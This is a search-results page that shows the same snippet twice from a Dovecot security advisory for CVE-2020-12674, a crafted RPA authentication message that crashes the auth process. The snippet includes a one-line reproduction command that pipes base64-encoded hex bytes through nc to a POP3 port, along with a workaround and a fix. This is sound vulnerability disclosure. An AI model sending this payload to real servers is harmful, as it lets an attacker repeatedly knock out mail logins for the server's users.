Displaying 2 results from an estimated 2 matches for "x03a".
Did you mean:
0x3a
2020 Aug 12
0
CVE-2020-12674: Specially crafted RPA authentication message crashes auth
...ity to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH RPA'; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01'
| base64 -w 0; echo ; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A at A\x00' |
base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
Workaround:
Disable RPA authentication.
Solution:
Upgrade to fixed version.
Best regards,
Aki Tuomi
Open-Xchange oy
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: applicati...
2020 Aug 12
0
CVE-2020-12674: Specially crafted RPA authentication message crashes auth
...ity to crash dovecot auth process
repeatedly, preventing login.
Steps to reproduce:
(echo 'AUTH RPA'; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01'
| base64 -w 0; echo ; echo -ne
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A at A\x00' |
base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
Workaround:
Disable RPA authentication.
Solution:
Upgrade to fixed version.
Best regards,
Aki Tuomi
Open-Xchange oy
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: applicati...